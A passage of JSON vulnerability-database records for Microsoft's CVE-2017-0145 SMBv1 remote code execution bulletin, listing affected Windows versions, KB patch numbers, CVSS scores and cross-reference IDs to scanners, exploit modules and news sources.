"Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": 
""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": 
"Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": 
"KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": 
"KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-06T10:43:29", "differentElements": ["msAffectedSoftware"], "edition": 15}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, 
"cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-06T12:49:42", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", 
"AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-27752"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM", "700099.PRM"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-06T12:49:42", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-06T12:49:42", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3212646", "KB4012217", "KB3177186", "KB3205409", "KB3210720", "KB4012213", "KB3210721", "KB3205401", "KB4012212", "KB3213986", "KB4012214", "KB4014077", "KB4012598", "KB4012216", "KB4013198", "KB4013429", "KB4012215", "KB4012606", "KBMS16-110, 3187754"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service 
Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 
Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", 
"msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-06T12:49:42", "differentElements": ["msAffectedSoftware"], "edition": 16}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-06T16:54:11", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", 
"MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752"]}, {"type": "openvas", "idList": 
["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM", "700099.PRM"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-06T16:54:11", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-06T16:54:11", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012215", "KB4013429", "KB4012213", "KB4012217", "KB4012216", "KB4012214", "KB3210721", "KB4014077", "KB3213986", "KBMS16-110, 3187754", "KB3177186", "KB4013198", "KB4012606", "KB3210720", "KB4012212", "KB3212646", "KB3205401", "KB4012598", "KB3205409"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": 
"KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, 
{"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", 
"msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", 